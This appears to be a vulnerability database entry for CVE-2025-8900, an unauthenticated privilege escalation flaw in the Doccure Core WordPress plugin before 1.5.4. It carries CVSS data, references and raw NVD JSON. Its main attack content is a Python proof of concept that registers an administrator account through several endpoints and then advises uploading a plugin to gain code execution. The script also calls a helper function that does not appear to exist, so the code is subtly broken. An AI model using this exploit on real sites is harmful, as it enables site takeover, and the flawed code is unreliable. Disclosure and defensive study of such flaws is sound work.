Security Vulnerability Report
CVE-2025-8900 CVSS 9.8 CRITICAL

Published: 2025-11-03 15:15:38
Last Modified: 2026-04-15 00:35:42

Description

The Doccure Core plugin for WordPress is vulnerable to privilege escalation in versions up to, and excluding, 1.5.4. This is due to the plugin allowing users who are registering new accounts to set their own role or by supplying 'user_type' field. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Doccure Core WordPress Plugin < 1.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import re

# CVE-2025-8900 PoC - Doccure Core Plugin Privilege Escalation
# Target: WordPress site with Doccure Core plugin < 1.5.4

target_url = "http://target-wordpress-site.com"

# Generate random username and email for registration
username = f"attacker_{requests.utils.default_username()}"
email = f"{username}@attacker.com"

# Construct the registration request with admin role
registration_data = {
    "user_login": username,
    "user_email": email,
    "user_pass": "P@ssw0rd123!",
    "user_type": "administrator",  # Key parameter for privilege escalation
    "role": "administrator",
    "wp-submit": "Register"
}

# Try common registration endpoints
endpoints = [
    "/wp-login.php?action=register",
    "/register/",
    "/wp-signup.php",
    "/?rest_route=/doccure/v1/register"
]

print(f"[*] CVE-2025-8900 PoC - Attempting privilege escalation...")
print(f"[*] Target: {target_url}")
print(f"[*] Username: {username}")
print(f"[*] Email: {email}")

for endpoint in endpoints:
    url = target_url + endpoint
    try:
        response = requests.post(url, data=registration_data, timeout=10, allow_redirects=False)

        # Check for successful registration indicators
        if response.status_code in [200, 302] and ("success" in response.text.lower() or "checkemail" in response.text.lower()):
            print(f"[+] SUCCESS: Registration request sent to {endpoint}")
            print(f"[+] Admin account created: {username} / P@ssw0rd123!")
            print(f"[+] Login URL: {target_url}/wp-login.php")
            break
    except requests.exceptions.RequestException as e:
        print(f"[-] Failed to connect to {endpoint}: {e}")

print("\n[*] After successful registration, login to WordPress admin panel")
print("[*] Navigate to Plugins -> Add New -> Upload Plugin to gain RCE")
```

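References

https://themeforest.net/item/doccure-medical-wordpress-theme/34329202
https://www.wordfence.com/threat-intel/vulnerabilities/id/49e133c9-5d3b-4a2a-8385-e2db44baa217?source=cve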

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-8900",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-03T15:15:38.177",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "The Doccure Core plugin for WordPress is vulnerable to privilege escalation in versions up to, and excluding, 1.5.4. This is due to the plugin allowing users who are registering new accounts to set their own role or by supplying 'user_type' field. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}
    ],
    "references": [
      {"url": "https://themeforest.net/item/doccure-medical-wordpress-theme/34329202", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/49e133c9-5d3b-4a2a-8385-e2db44baa217?source=cve", "source": "[email protected]"}
    ]
  }
}
```